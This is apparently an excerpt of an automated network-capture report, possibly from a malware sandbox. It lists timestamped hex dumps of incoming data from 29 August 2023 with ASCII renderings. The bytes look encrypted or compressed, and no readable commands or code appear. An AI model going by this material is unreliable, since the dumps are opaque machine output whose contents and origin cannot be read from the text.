                                                                                                                  2023-08-29 17:16:42 UTC1772INData Raw: f1 1a 22 d5 85 02 50 50 45 3a 2c 5b 8d 23 18 b0 c6 49 9a 30 5a 12 92 dc c8 89 19 9a 0c 49 9d 8c 84 4d 6d 90 58 a1 18 1d ba b6 f9 7a 51 59 92 85 49 c3 18 53 31 5d 99 d8 bc 3b 6d f0 44 3e 6d da 76 49 d9 8b 18 8a 90 88 49 a2 39 d7 82 09 15 d2 a5 59 92 dd 45 a5 36 96 45 1f 4e e3 ba 49 38 ad 49 40 51 dc ce ba b1 5a 0f 48 38 42 1f a9 58 86 c5 c7 19 53 ac 62 6d e7 c6 a0 2e d0 31 6e 50 a4 5d ca f0 db 45 3d 1e 53 ac 4f 6d ca ae 49 32 55 ba 3c 3e 50 25 44 39 6f ce b2 f2 1c 25 48 02 50 6d 01 14 90 25 48 d9 f1 81 3c 14 d0 cc 14 15 3b f0 c2 51 dc 45 bf d8 50 31 4d 2a 26 ae 49 b0 53 a4 b5 99 19 c5 c0 19 98 49 a2 87 5b 08 41 e6 d4 40 fd 19 f1 1a c0 51 c0 1b 45 f0 ba c5 62 3b 01 55 ca 7c 24 4f 49 99 8d 55 c9 44 d0 c4 aa 99 55 85 5a 41 b0 74 8e 5c 20 49 09 18 58 4a dd d9
                                                                                                                  Data Ascii: "PPE:,[#I0ZIMmXzQYIS1];mD>mvII9YE6ENI8I@QZH8BXSbm.1nP]E=SOmI2U<>P%D9o%HPm%H<;QEP1M*&ISI[A@QEb;U|$OIUDUZAt\ IXJ
                                                                                                                  2023-08-29 17:16:42 UTC1776INData Raw: 13 c2 6c 01 c6 10 4f 38 36 0a d9 8c d4 68 00 17 40 25 c9 d3 4a 2e 0b a1 34 4d 28 87 76 89 f9 fc 35 66 7f d0 c6 2c e7 d0 c6 8f 59 80 c5 c4 9c 20 b8 b6 e6 b6 d5 5f 15 80 fb 78 24 a0 17 1f 49 b6 82 d9 5c 2a 7f 49 49 d0 b9 67 29 d9 ff cd 29 d9 ae b9 24 51 47 7b 1b 80 75 24 1b 40 27 76 6d 7f 05 72 df a7 43 e3 b9 de b5 5c 3a eb 00 59 66 d2 46 79 32 d3 85 19 f1 19 7a e2 eb ce 25 48 39 03 42 45 d8 f8 c5 69 1b b4 3b 46 fe c7 ac 25 19 cb d6 4c 49 80 14 a1 4d 9c b4 6a f0 40 67 b6 18 73 70 ca 24 4c 0d 00 19 d0 74 89 44 a5 57 b6 79 a3 65 24 68 de d4 79 57 89 ac 0c e8 9d 00 45 69 b1 cd 01 73 d2 15 62 94 91 ba 99 00 94 1e f6 78 af 23 46 af 30 6e 99 09 91 ba 0c e1 04 c2 c0 54 d8 65 3d 4d 50 7c 49 ab a4 2d 23 3b d1 95 ea e6 e5 c5 e9 1c 83 15 49 4a 2f 30 b1 4e 2f 70 ed 59
                                                                                                                  Data Ascii: lO86h@%J.4M(v5f,Y _x$I\*IIg))$QG{u$@'vmrC\:YfFy2z%H9BEi;F%LIMj@gsp$LtDWye$hyWEisbx#F0nTe=MP|I-#;IJ/0N/pY
                                                                                                                  2023-08-29 17:16:42 UTC1780INData Raw: ac ab 18 ea 38 45 9c f0 ba 3d 0f 5b 42 39 1a e7 15 80 c9 58 ad d1 6b d3 31 4f 69 d3 35 4b a1 5b 18 5d c9 83 95 4b e9 d6 ce a9 01 fa 4d b9 1e 5b 47 20 d9 00 46 0f f0 e2 9c 19 19 71 69 99 24 40 3b 5b f1 c4 9e ad 18 45 e6 b8 19 df c1 de 18 52 01 71 01 a4 66 c2 e1 5a 45 46 99 29 78 3d 03 87 ad 0b 23 00 40 c4 45 d3 44 7b 1a 89 45 c3 15 c8 c8 75 01 54 8c 49 6c 31 ce b2 1a 13 c5 71 11 ed 30 60 f8 f6 31 6a 99 a8 45 4b 23 a5 58 c9 61 d3 78 0d 6c c7 05 50 49 38 47 38 1a ac 41 4e 1c a3 46 4a de 3b 97 c2 19 17 6e 8a 1a 16 15 a1 e1 d6 6e eb 14 50 1b c0 18 df c0 1c fa 31 d5 39 41 e6 ad db 39 df 45 c9 29 1f a0 08 05 dc 85 41 de d5 b4 52 a8 cd 65 50 9d 39 87 b8 74 86 ad d0 a8 d0 46 19 5c d8 ce 41 79 d6 14 89 14 38 f9 d1 83 e2 23 58 09 e1 4a d8 b4 f3 35 4b 1b a1 37 4b 09
                                                                                                                  Data Ascii: 8E=[B9Xk1Oi5K[]KM[G Fqi$@;[ERqfZEF)x=#@ED{EuTIl1q0`1jEK#XaxlPI8G8ANFJ;nnP19A9E)AReP9tF\Ay8#XJ5K7K
                                                                                                                  2023-08-29 17:16:42 UTC1784INData Raw: 53 4b 9f 9d 45 41 12 95 9d 16 90 a1 43 49 90 89 47 2f 90 91 4f c2 19 95 a9 17 7f 59 54 12 d0 d0 86 92 0a 93 45 63 0d 93 51 49 98 d0 46 e2 19 d3 43 5c 5a 84 45 34 19 d3 f6 49 1a 2d 45 4a c5 91 45 4a 78 c6 06 49 52 d0 46 5e 98 d0 46 1c 92 3c c6 a5 05 d0 94 49 4a 5b 18 55 4f 5b 8d f7 18 d1 88 c8 f8 d0 c5 49 19 f3 45 8f 7f 55 8c 1e df 95 a1 19 d5 16 00 ac 99 d1 a3 c9 18 37 10 c9 18 38 c5 48 f0 50 44 a3 99 d1 ae 5c 99 d1 a9 c9 18 3d c5 48 f7 2b 83 09 5c 3f 7a 8e 5c 2c 47 18 c9 d0 31 4f df 93 47 64 f2 d4 44 c9 1b f0 ce 34 15 b6 c0 9b 19 a5 5b cc e6 a5 5f 70 64 50 4d 3c 0c b6 c6 6a 19 d1 49 49 df 93 46 48 df 93 41 79 1d 39 bb 49 03 b6 7e 9f 6c aa 47 f1 98 74 23 8e 1a d1 45 72 59 28 30 4f 9a ad 4d 49 66 27 47 8e 19 da 05 3c 1e b8 71 01 09 93 45 a2 5f d0 0e 3d 0c
                                                                                                                  Data Ascii: SKEACIG/OYTEcQIFC\ZE4I-EJEJxIRF^F<IJ[UO[IEU78HPD\=H+\?z\,G1OGdD4[_pdPM<jIIFHAy9I~lGt#ErY(0OMIf'G<qE_=
                                                                                                                  2023-08-29 17:16:42 UTC1788INData Raw: 46 75 5e 04 41 02 e4 d0 c0 44 cb bb f0 43 bc 2a 45 e1 ac e5 29 d1 ab 92 93 49 d0 6b 9e 09 e0 6c e9 aa 19 bc 9d 7b 6c 8c 9a 0c d6 d0 48 9f c5 89 78 98 b2 7c 45 79 c0 f6 7f 49 c7 81 c5 49 48 07 8d 5f 78 00 fa fc 19 24 f1 68 3a 14 f6 1f 80 d0 d0 f3 d6 df e0 f4 a1 4e 45 f1 1b f8 4d c1 1c 8f f7 49 c0 dc 83 6d f0 db f4 ce 19 ac 2a 66 08 9c 2d 11 b2 d0 58 28 d8 ed 68 2f af 40 45 08 c5 a6 43 38 c2 d1 f9 49 39 02 dd 63 09 05 aa c0 19 55 f4 38 06 65 f3 4f bc d0 a1 f6 86 e3 91 f1 f1 72 45 80 1e a8 71 b0 19 df cb 49 b1 d9 d3 51 81 de a4 f2 19 dd 2f 36 34 ed 28 41 8e d0 29 2d 88 d1 19 2a ff 24 45 18 72 bb 27 28 75 cc 9d 49 29 b5 c0 07 19 b2 b7 a4 19 45 43 25 62 75 44 52 d8 d0 b1 41 9b 87 81 46 ec 16 45 90 a9 b5 15 a0 ae c2 af 49 a1 6e ce 35 91 69 b9 96 19 cd 98 2b 50
                                                                                                                  Data Ascii: Fu^ADC*E)Ikl{lHx|EyIIH_x$h:NEMIm*f-X(h/@EC8I9cU8eOrEqIQ/64(A)-*$Er'(uI)EC%buDRAFEIn5i+P
                                                                                                                  2023-08-29 17:16:42 UTC1792INData Raw: 09 19 1a d0 e5 a9 4b d3 45 71 d9 d2 17 89 19 7a 27 89 19 a2 85 49 9b 10 45 d9 d9 d0 ef ed d9 d0 39 89 15 10 85 48 d7 10 45 4f f9 11 7d 89 19 de 0a 4a 19 f6 10 89 19 e8 85 49 53 10 45 17 d9 d0 31 1c d9 d0 cb 89 19 4e 85 49 b5 10 45 f3 4c 10 45 81 d9 d0 9d 89 19 3c 85 49 e1 85 85 49 13 10 5e 53 d9 d0 69 89 19 ec 40 89 19 1c 85 57 93 81 46 49 7d 85 85 4b 6f 10 45 c1 d9 d0 e1 89 19 60 10 89 19 10 85 49 cb 10 45 ad d9 d0 bf 1c d9 d0 55 89 10 ce 85 49 2d 10 45 0f 4c 10 45 1f d9 d0 35 89 19 ca 85 59 bb 85 85 48 a5 10 45 81 d9 d0 a5 89 19 3a 10 89 19 26 85 49 11 10 43 21 d9 d0 71 1c d9 d0 03 89 19 86 85 49 67 10 45 c5 ac 10 45 d3 d9 d0 f1 89 19 d1 45 cf d9 98 47 dd dd be 40 4a 75 a3 31 3b 19 b3 35 30 77 91 45 4d 18 d9 05 e5 5d a2 45 e5 4d a9 35 2c 11 91 45 3e d8
                                                                                                                  Data Ascii: KEqz'IE9HEO}JISE1NIELE<II^Si@WFI}KoE`IEUI-ELE5YHE:&IC!qIgEEEG@Ju1;50wEM]EM5,E>
                                                                                                                  2023-08-29 17:16:42 UTC1796INData Raw: 45 49 70 b0 45 2e 76 d0 41 49 59 30 4c 2e 6a bf 45 6e 01 f5 36 6e 78 c3 a4 49 39 f8 60 48 fb 83 22 25 76 d0 e5 26 5a c4 45 c9 79 d0 44 a9 18 7c 31 0d 4c b2 45 4e 79 d1 39 29 1b b0 25 49 1d 85 25 48 41 30 45 75 79 d0 47 29 18 e8 10 a9 19 f8 a1 4b 39 30 45 41 7d d1 41 e0 f9 d0 99 27 7a d4 91 a9 19 6c 21 48 43 64 a5 49 65 b0 45 28 1d a4 a5 49 71 85 a1 4b 79 30 45 01 79 d0 51 29 18 90 90 a9 19 f8 21 48 39 30 45 59 79 d0 44 49 4b d8 a5 49 f5 bd a6 4c fd 30 45 81 b2 b0 45 28 1d 10 a5 49 b9 b4 44 d1 f9 d0 13 35 7d d4 ac 5e 6d b0 47 05 79 d0 57 fc 79 d1 01 a9 19 e4 25 49 78 c0 69 a9 19 06 45 2d 18 b1 5b b6 19 d0 43 ad 19 31 44 9a 74 d0 a4 4b fd bc a6 6a 1c b0 45 a8 15 d1 24 4b 8d a6 01 49 37 8a 7f 0a 18 71 c5 49 76 bf 7f 67 d9 56 7f 59 37 bc 3f 21 38 d1 2f 49 58
                                                                                                                  Data Ascii: EIpE.vAIY0L.jEn6nxI9`H"%v&ZEyD|1LENy9)%I%HA0EuyG)K90EA}A'zl!HCdIeE(IqKy0EyQ)!H90EYyDIKIL0EE(ID5}^mGyWy%IxiE-[C1DtKjE$KI7qIvgVY7?!8/IX
                                                                                                                  2023-08-29 17:16:42 UTC1800INData Raw: 75 49 f1 86 e8 bd 3e a0 45 c5 29 d0 01 79 19 d0 3c 79 19 68 e9 39 1d e0 45 7b 39 a0 45 69 40 e0 45 91 b2 60 4f 79 19 80 75 49 11 89 75 49 dd 7a b1 08 69 d0 35 79 19 f8 ec 79 19 24 ec 7a 18 60 35 49 75 e0 45 83 31 e0 45 59 29 d0 99 e1 29 dc 75 49 d3 b4 75 49 05 e0 45 91 be 60 41 79 19 1b 37 5e 69 d0 4d 79 19 34 e3 f9 13 e0 45 73 99 e0 45 29 29 d0 b7 56 69 d0 9d ec b2 20 4e 79 19 88 75 49 09 e0 45 4d 29 d0 e9 89 bd 60 50 79 19 e0 75 49 09 e0 45 f0 a8 d2 81 ea 69 d2 75 49 a8 d0 c1 39 19 62 79 79 19 24 e7 f9 1b e0 45 35 29 d0 f3 09 29 d0 b7 79 b8 a0 45 79 19 b0 75 49 ab c8 75 49 c9 70 35 6d 29 d0 79 79 19 7c b5 d6 69 81 75 49 79 e0 45 69 29 d0 e9 a5 87 a0 53 79 19 bc 75 49 35 e0 45 7a 6b e3 35 49 d5 4d f5 6a 29 d0 4d 6e 99 96 45 fd 3f 96 45 15 69 d0 0f 01 e9
                                                                                                                  Data Ascii: uI>E)y<yh9E{9Ei@E`OyuIuIzi5yy$z`5IuE1EY))uIuIE`Ay7^iMy4EsE))Vi NyuIEM)`PyuIEiuI9byy$E5))yEyuIuIp5m)yy|iuIyEi)SyuI5Ezk5IMj)MnE?Ei
                                                                                                                  2023-08-29 17:16:42 UTC1804INData Raw: 5d 4e 7b d5 e7 5f 38 d7 12 20 77 b4 2a 47 6e d2 32 89 1c 51 42 07 4d 83 01 79 46 95 04 1a 50 d7 20 4e 57 84 65 69 4a b5 26 3c 59 c0 3c 69 99 94 20 3a 7a a2 2c 39 f9 d2 45 60 19 85 16 0c 46 95 03 49 46 85 11 16 4d 99 08 0c 1a bb 43 49 3c a6 20 3b 6a b1 29 59 39 84 2c 24 f9 10 65 69 34 b7 a5 44 1a d0 25 85 7d b3 a5 8e 18 47 2b 13 3e 50 12 39 59 cd 45 24 7c b1 12 30 fd f0 27 89 66 b4 24 0b 61 d0 60 2b 0f 4a 45 a8 1e 88 80 5b 7d 4c 78 3a f9 ac 25 39 39 bf 29 2d 3a 8f 25 55 7c d4 29 2d d9 14 68 11 34 f0 2e b5 7c b5 07 4a b8 d1 65 79 18 d5 04 86 f8 d8 41 3a 76 34 4d 3a 71 bf 32 69 9b b1 a5 94 78 a6 24 20 75 31 90 68 39 0e 31 20 76 be 27 6d 6d b8 19 20 6a 74 6e a9 3a 31 43 2d f0 d6 21 a9 7c b2 30 2e 7e 91 d7 c9 31 b0 78 26 79 c9 45 5f bb 59 05 4f 69 31 74 28 1f
                                                                                                                  Data Ascii: ]N{_8 w*Gn2QBMyFP NWeiJ&<Y<i :z,9E`FIFMCI< ;j)Y9,$ei4D%}G+>P9YE$|0'f$a`+JE[}Lx:%99)-:%U|)-h4.|JeyA:v4M:q2ix$ u1h91 v'mm jtn:1C-!|0.~1x&yE_YOi1t(
                                                                                                                  2023-08-29 17:16:42 UTC1808INData Raw: 4c 8f 31 d7 26 8a 9b 91 1a 78 1d 8b bf 35 5b d3 77 ca 5e d1 41 c9 08 91 37 4a 2d 94 2b 26 d8 d3 2a 3b 39 d0 2d 69 a9 b1 26 3d 6a 93 62 cb 80 f0 45 2e 18 94 d9 69 34 82 65 6b 33 fe f9 2a 3b 58 56 48 1f 50 41 c9 b9 bc c5 69 08 d1 62 3c 6b a2 44 c8 7d b9 37 56 9b 63 46 66 9a 57 c4 45 d6 f6 68 25 75 2c 65 33 59 c7 83 6f 9d 59 85 8e 9a d9 85 47 0a 50 40 08 01 f0 3f c8 db be 33 2c 1d a2 31 c8 5a 93 17 69 55 96 38 89 0a 83 43 01 58 cc 04 e2 9b 1a 23 2c 76 f8 29 2d 46 16 08 64 98 cc 2b 2c e7 a7 60 4b fb d4 25 66 9b f0 a4 47 5a c9 64 40 e6 b2 40 68 17 90 39 a9 4e 76 c0 c8 3c 30 0e 4d 11 ce 7f bd 15 12 43 aa 3c 5e 4b 69 34 a8 05 69 7f bf 2a 67 7a b0 42 1d 2b bf 66 45 76 be e5 3d 9a df 28 28 d7 a4 85 4d f9 c9 04 62 70 be 45 69 79 d7 96 ac 14 72 d5 25 6c f0 04 2e 7a
                                                                                                                  Data Ascii: L1&x5[w^A7J-+&*;9-i&=jbE.i4ek3*;XVHPAib<kD}7VcFfWEh%u,e3YoYGP@?3,1ZiU8CX#,v)-Fd+,`K%fGZd@@h9Nv<0MC<^Ki4i*gzB+fEv=((MbpEiyr%l.z
                                                                                                                  2023-08-29 17:16:42 UTC1812INData Raw: 26 99 0b d0 5b 64 1b da 24 40 0c b5 24 2a 71 54 75 88 14 a6 c4 8c 14 a6 20 3b 7b bf 36 49 0c e5 05 60 78 d2 2c 61 5a cb c4 7a 34 a6 17 6b 18 a4 32 3a 98 d9 36 48 1e b9 ef 27 19 c3 28 4b 13 f9 84 58 68 15 54 39 68 a5 2c 2c d8 ad 01 58 d8 d6 2f 48 dc d6 2f 3c 77 bb 65 2d 70 10 37 2c 7a a4 2a 3b 19 5b 07 05 ed f8 36 49 1a b5 c6 7f 1b 8c c7 4c dc 98 27 24 dc de 24 2f 6d 50 0a cc 5d b3 44 c9 45 a4 20 2d 35 f0 21 2c 11 bc 20 3d 98 92 2c 2e 70 be c1 28 75 d3 e6 69 31 bd 2a 08 a5 fe 2b 09 7a 94 49 8c 0a a2 82 25 7a a5 6b 3b d9 eb 47 40 dc f4 2c 8b 3a b5 20 85 39 82 07 4e 18 ea 27 2c 19 77 05 46 f9 92 24 3a 70 b3 81 e6 d8 5d 85 5b 5b 85 84 58 7a bf 35 30 1b c4 68 9d 39 a3 85 6b 7a d3 74 3a d9 c5 43 62 2a d0 5d 0b 10 f8 30 89 02 12 34 64 34 38 2a 3c 6d 12 08 2d 98
                                                                                                                  Data Ascii: &[d$@$*qTu ;{6I`x,aZz4k2:6H'(KXhT9h,,X/H/<we-p7,z*;[6IL'$$/mP]DE -5!, =,.p(ui1*+zI%zk;G@,: 9N',wF$:p][[Xz50h9kzt:Cb*]04d48*<m-
                                                                                                                  2023-08-29 17:16:42 UTC1816INData Raw: 86 42 24 f5 b5 42 d8 76 b4 33 7c d2 21 a9 19 f0 68 77 39 f5 21 d9 3c f5 65 3a f9 8b 2b 2e d8 c6 e6 30 1c df 40 49 19 dd 75 49 37 e0 45 f4 98 34 37 8b d7 06 57 0b 83 80 cd 61 e8 d8 b4 7b a4 fe 6c 73 28 d8 b4 5f 49 8e 76 4c ba 93 47 ea cb a5 29 25 e8 df 26 7a 29 a9 da 4d 70 a3 b7 4a 6a cd 00 48 a8 f9 60 92 9b d1 36 55 78 c7 e7 99 18 bc 45 7d a8 f3 d8 38 15 97 d5 2c bf d4 77 c2 13 d0 54 6e 1e 33 55 3a 3e b0 a6 22 70 a0 35 2c f8 30 47 69 3c bc 30 b0 18 60 44 98 11 2c 36 66 78 c0 15 f1 ab d6 21 4b 6a fc 73 60 e7 9e 74 61 39 b4 b7 4b 89 90 25 78 d8 d2 f4 0c 18 80 43 33 70 5c fd 49 69 f0 32 28 6b be 2c 27 99 b7 7f 69 3c a3 4f 49 19 d0 41 33 70 d6 dd 49 39 f0 24 2d 5f b4 41 39 18 bc 32 28 6a d4 01 69 19 b6 2c 25 7c a3 65 3d 76 de 65 48 47 d1 5d 48 27 a3 21 73 39
                                                                                                                  Data Ascii: B$Bv3|!hw9!<e:+.0@IuI7E47Wa{ls(_IvLG)%&z)MpJjH`6UxE}8,wTn3U:>"p5,0Gi<0`D,6fx!Kjs`ta9K%xC3p\Ii2(k,'i<OIA3pI9$-_A92(ji,%|e=veHG]H'!s9
                                                                                                                  2023-08-29 17:16:42 UTC1820INData Raw: 15 4a b8 d3 b4 55 aa c3 b7 f1 49 9b 40 ae 6b f5 96 07 88 d6 2a 39 09 e3 c6 52 9d d2 96 78 40 13 4d 2c 6f 61 44 2f 28 18 04 22 50 e1 8c 2c 61 10 cb 69 31 e1 20 3e 63 b9 85 2a 78 50 54 38 3f 13 53 7f a5 f0 22 2a 74 10 da 98 12 bc 24 79 1a 33 09 3e e6 50 4c 6a 70 30 c9 39 d9 a1 83 d9 10 90 43 2c 3b e1 b5 6d 7f b9 3d ee 4d a4 44 65 39 d6 2b f8 b3 00 44 39 6b bf 33 20 33 b4 b6 45 6c 23 35 16 8c 98 65 74 da 10 8f fb ad bb 2b 26 6e 51 48 58 83 e3 15 73 b9 4a 37 20 59 86 e5 51 24 f0 05 79 61 f5 75 7d 61 a1 4b 3a e1 a4 24 3b f9 be ed 2d aa ba b0 4a 28 11 49 3b 7c 60 53 59 1b bd 20 3d 71 60 2a 2d 39 f5 64 4b 59 f8 20 f9 95 2f 64 c8 f8 a2 a5 82 e9 c9 15 cf f9 45 4f 4f ea 83 ba 22 18 30 98 5d 5f 49 4d b9 43 20 48 28 db 11 54 4a 0b 07 24 40 6a a9 36 3d 7c bd 0d 69 6d
                                                                                                                  Data Ascii: JUI@k*9Rx@M,oaD/("P,ai1 >c*xPT8?S"*t$y3>PLjp09C,;m=MDe9+D9k3 3El#5et+&nQHXsJ7 YQ$yau}aK:$;-J(I;|`SY =q`*-9dKY /dEOO"0]_IMC H(TJ$@j6=|im
                                                                                                                  2023-08-29 17:16:42 UTC1824INData Raw: f6 06 25 97 37 49 a9 a8 37 49 55 d0 5d 3b 19 83 c1 49 11 a2 41 00 19 28 05 39 46 80 11 1a 19 3c 35 49 57 a0 50 91 5c a4 45 8d 6b d0 0b 49 b5 a0 45 19 a9 84 07 49 81 a0 45 78 37 58 37 49 91 92 45 31 6b d0 09 49 7d a2 45 c1 56 d0 15 3b 19 93 45 7d 6b d0 cd 0d 19 f4 37 49 5f d0 55 3b 19 c7 b5 68 e9 c8 f4 04 f1 a2 45 01 19 08 54 3b 19 9d 45 81 6b d0 0b 49 ad c1 37 49 50 d0 e1 3b 19 91 45 d9 08 a2 45 13 19 50 37 49 4b d0 29 58 6b d0 10 49 45 a2 45 10 19 98 54 3b 19 86 45 71 69 d0 16 1f 5f 2c 45 79 69 d0 34 44 e8 f0 b4 5b e8 cf 34 5b 4f f4 31 49 1c d0 a9 f9 af 34 75 49 ed b5 75 49 c5 e0 45 25 17 ef 45 78 19 f0 dd 4c 8a c9 3c cc a8 74 45 0f a9 5c f2 78 8e 20 51 78 b3 78 35 49 e8 ad c1 39 19 bd b4 fd 41 a0 45 f8 be f8 35 49 e8 64 41 ac 69 d0 56 39 19 08 01 39 89
                                                                                                                  Data Ascii: %7I7IU];IA(9F<5IWP\EkIEIEx7X7IE1kI}EV;E}k7I_U;hET;EkI7IP;EEP7IK)XkIEET;Eqi_,Eyi4D[4[O1I4uIuIE%ExL<tE\x Qxx5I9AE5IdAiV99
                                                                                                                  2023-08-29 17:16:42 UTC1828INData Raw: 06 79 2e d6 45 40 79 56 0d 48 9f 2d 29 09 1a d1 75 63 29 f8 40 03 1b f8 44 5f 05 51 6d 3a 19 f9 32 3e 1b a7 ce 61 5a 80 16 79 11 d6 45 4f 7e 51 49 48 1d d1 75 4d 98 52 40 53 18 d1 41 3f 29 d8 31 79 3d 55 42 79 18 56 5d a8 9d f5 2a 2a 6a a0 4f 58 19 f1 00 40 b1 d2 c3 09 1c ff 24 c8 1e a3 0e 52 33 94 45 4a 5a d0 46 08 da e1 0c 0d 19 93 2a 2d 7c 83 2c 2e 77 90 2c 27 7e 93 04 64 98 e4 31 4d 29 dc c4 7d 0a d1 44 b6 1d d0 47 79 19 e0 48 4f 10 fa 05 cf 51 56 b2 44 18 d0 5d 49 19 d3 c7 48 18 d0 cc 44 e8 d0 db ea 82 0e 26 50 3a 4c 45 90 87 63 41 f6 e9 88 72 49 e8 66 17 2b da 81 cf 87 19 5b 7c f1 96 f0 e8 77 e4 d0 f1 d8 57 7c cc d6 fe 16 45 d1 5e 8d 3e 39 44 fd 76 49 e7 91 fa cd 8f 0f 10 b8 19 b5 7d cc ae cf 54 71 3e d0 32 49 bb 5f d0 11 82 da 45 ce 79 22 06 39 8b
                                                                                                                  Data Ascii: y.E@yVH-)uc)@D_Qm:2>aZyEO~QIHuMR@SA?)1y=UByV]**jOX@$R3EJZF*-|,.w,'~d1M)}DGyHOQVD]IHD&P:LEcArIf+[|wW|E^>9DvI}Tq>2I_Ey"9
                                                                                                                  2023-08-29 17:16:42 UTC1832INData Raw: 45 11 8f aa f3 de 42 f2 0a 49 c4 c2 8c ce fa ac d7 66 19 71 11 87 07 d7 47 2b 63 d0 b9 ad d3 6c ac de cb ee 45 a1 db 75 61 f7 2a f6 c6 49 a4 4f 27 ad 44 a1 30 00 19 1f ba c3 9b f7 82 cc f5 d0 2e 88 ed be f7 12 39 41 45 3f dc 20 28 d6 72 2e f4 49 5f ba 4f a9 f0 92 be aa 19 b7 1a 01 1a 91 e9 c7 46 d0 4d df e3 9f 99 c0 93 60 45 fe 33 3f 22 78 40 39 24 49 35 f8 0c e2 1d 03 5c 37 19 2e 18 e7 b2 a3 81 94 53 d0 31 e7 d9 e0 26 c5 f4 a7 45 60 1a 95 aa 8a 9a c0 c6 49 fa 8e 59 d4 7b 09 1c c5 19 ea 0c 91 a7 df 3b 0d 1f d0 97 2f 8a a7 01 3c 88 b6 45 c7 09 19 67 d2 3f fa ac 49 eb cf 71 fb 7a d0 e8 82 19 3c 91 43 e2 ff 83 0d 63 d0 b8 55 37 5c 00 61 23 80 45 dd cd 21 e7 1f b9 d4 ae 49 c6 b0 48 9b c6 7b 36 7b 19 bc df 2c 57 65 bd a1 15 d0 e4 eb de 5b 82 93 92 f8 45 ef e5
                                                                                                                  Data Ascii: EBIfqG+clEua*IO'D0.9AE? (r.I_OFM`E3?"x@9$I5\7.S1&E`IY{;/<Eg?Iqz<CcU7\a#E!IH{6{,We[E
                                                                                                                  2023-08-29 17:16:42 UTC1836INData Raw: 40 b1 19 7e 1c 7e 93 ba 60 4a 8d d0 f4 10 98 80 ad f3 9a 50 45 fe 3a e5 b1 3f a0 b7 58 49 40 c8 e8 69 94 44 74 cb 19 c1 72 79 9b c1 76 4b 18 20 44 79 98 43 9a d7 c6 4e 9a d7 c6 4e 4a 96 87 0f db 96 87 00 db 4b 09 8d ef 49 cd cc 84 e0 49 db 18 a4 d9 72 3c 7d ed b2 7e 08 32 c1 cd 59 7c d3 41 4b 59 9a e5 c8 b0 55 a5 71 13 b4 69 40 00 d4 74 49 2e d8 44 79 00 46 68 40 1a e1 49 4d 1f da f5 c9 1d d1 c7 7e 1b dc 44 4d f9 b1 92 49 12 e1 4b 79 08 09 44 5c 29 fa 9d 49 15 e1 59 09 29 ca e4 51 99 c6 8d c3 6f 30 28 3e 78 a2 20 db 2f 60 d0 0f 1f d0 41 78 3b d4 65 ee 14 6d 45 d1 7c 53 b2 5b 94 42 bb 49 2f 66 c6 52 be 5a 88 df 19 95 5d 4a b1 40 4c 92 be f0 0d c5 f5 f1 e1 b5 4c d4 c7 49 18 d0 7e 9e 37 4c 93 84 19 16 60 c8 2a 4b b5 a5 38 d0 34 93 69 43 5e 4f af db 45 5f be
                                                                                                                  Data Ascii: @~~`JPE:?XI@iDtryvK DyCNNJKIIr<}~2Y|AKYUqi@tI.DyFh@IM~DMIKyD\)IY)Qo0(>x /`Ax;emE|S[BI/fRZ]J@LLI~7L`*K84iC^OE_
                                                                                                                  2023-08-29 17:16:42 UTC1840INData Raw: 84 4a 19 3f 44 44 d9 d3 c4 62 d8 d3 65 8d 1a 11 73 88 1a d2 55 89 1a 91 fd 3a c8 46 b7 42 d0 af 01 53 59 d2 42 1b 83 b9 95 5c 11 d7 75 4d 1e f8 84 48 94 9c 61 61 69 38 5b 2d 10 30 a5 49 2a 10 0d 01 98 14 24 1a da 1c 4d 49 51 80 cc 05 3d d8 c5 1f 41 d0 46 f3 df d8 04 5d 19 d7 05 a1 dc 30 09 b9 27 63 a4 5a f8 c8 ba 19 59 ca 25 06 de b0 5e 4a bb 8e a1 4b 51 53 85 01 58 69 85 fd ca 62 e4 05 94 11 5b 29 0a c1 e5 0a d1 38 e3 69 46 91 fd 4d 68 32 57 1d 3d 90 84 5c f9 d2 20 40 59 d0 c0 89 6c d4 76 89 f2 8e 1f 01 f9 d9 6d a8 10 30 45 6d f8 d0 09 d4 99 c1 61 08 10 f0 59 6c 31 80 2d 0a 0d 50 77 4e 19 d0 4a ff d9 b4 42 65 3b 94 a4 65 f9 dd 61 c8 12 f8 ad 9f 9d 74 14 2b 49 e8 64 48 21 10 5a e8 05 d9 8f 56 d5 94 85 4a 01 98 cc 1d 0d f4 55 6c 38 48 e7 45 95 f4 ed 00 f9
                                                                                                                  Data Ascii: J?DDbesU:FBSYB\uMHaai8[-0I*$MIQ=AF]0'cZY%^JKQSXib[)8iFMh2W=\ @Ylvm0EmaYl1-PwNJBe;eat+IdH!ZVJUl8HE
                                                                                                                  2023-08-29 17:16:42 UTC1844INData Raw: aa 89 df 95 b5 c4 19 5c 61 ab 18 d1 07 fd df d2 6d f1 41 99 47 4f a5 e3 47 4f d9 11 47 4f dd c2 14 4b 1f 30 03 49 1f ba 15 11 28 d0 3b 95 a1 37 45 42 19 d8 9b ca 1d 10 8b 49 1f 30 c6 88 41 ba c7 3c 18 c9 a7 8e 5c 0c 1a 4a 37 42 29 4b 1f 40 67 4b 1f 44 4f 4b 1f d4 dd b7 18 30 38 d5 f2 94 ce 49 5c 68 7c 0c ed a5 04 2f 19 5b 00 b5 7f eb 00 a1 6c 50 72 46 ae 95 b9 4a de d1 2b 09 e6 95 b1 b6 5c 28 c5 18 cf 51 c5 48 73 17 00 c1 69 de 44 16 19 3e 32 c2 5c 34 7e 0c fd 90 32 4e de 95 ed 4d 19 f4 7c 49 54 28 33 fe 92 95 8d c2 19 0a 6e 91 a0 df 3a bc 1d 91 c5 4c 9a 1f ba 62 d1 50 46 c0 19 9d b1 f0 41 b1 71 49 16 d0 f2 5d 47 fb 8d 72 c8 3b 45 19 16 67 49 17 f1 04 b8 49 e6 2f ce 04 d1 5b 95 f1 18 d1 4b 62 d8 53 bd 4e 66 f2 05 c2 44 24 2f 41 40 d0 5e 8b 19 5d 71 76 2a
                                                                                                                  Data Ascii: \amAGOGOGOK0I(;7EBI0A<\J7B)K@gKDOK08I\h|/[lPrFJ+\(QHsiD>2\4~2NM|IT(3n:LbPFAqI]Gr;EgII/[KbSNfD$/A@^]qv*
